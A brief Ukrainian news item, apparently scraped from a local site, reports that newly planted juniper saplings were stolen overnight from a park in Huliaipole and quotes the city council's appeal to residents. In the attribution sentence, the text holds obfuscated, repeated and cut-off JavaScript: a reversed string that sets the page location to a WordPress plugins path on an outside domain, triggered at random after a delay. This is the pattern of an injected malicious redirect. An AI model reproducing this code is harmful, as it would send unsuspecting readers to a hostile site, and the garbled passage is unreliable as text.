НовиниУ одному з парків Гуляйполя вкрали нові саджанці

У одному з парків Гуляйполя вкрали нові саджанці

-

У одному з парків Гуляйполя вкрали нові саджанці

У Гуляйполі, в одному з парків вночі невідомі вкрали нещодавно висаджені саджанці ялівцю

Про це toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dok_u_parku.html#prettyPhotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to”>повідомляють на сайті Гуляйпільської міської ради Запорізької області

Сама рада опублікувала на сайті звернення про такий вчинок:

– Коли в Гуляйполе приїздять люди з інших громад, вони захоплюються красою парку біля нашої каплички. Щоб він мав такий вигляд, необхідно було вкласти чимало спонсорських коштів, сил і енергії людей, які доглядають за кожним кущем та деревцем.
Прикро, коли є «розумники», які вирішують поділитися цією красою. Вночі вкрали нові саджанці ялівцю, які зовсім нещодавно висадили на території парку.
Шановні мешканці міста, якщо ви хочете жити в гарному місті, будь ласка, цінуйте працю інших людей. Якщо ви нічого не робите для Гуляйполя, принаймні, не руйнуйте те, що роблять інші.

Такий вчинок вандалізму звичайно має бути прикрим як для жителів міста, так і для туристів, які приїджають у містечко. Один з читачів надіслав ексклюзивні фото з результатами вандалізму.

Коментарі

Варте уваги ПОВ'ЯЗАНІ
Рекомендовано Вам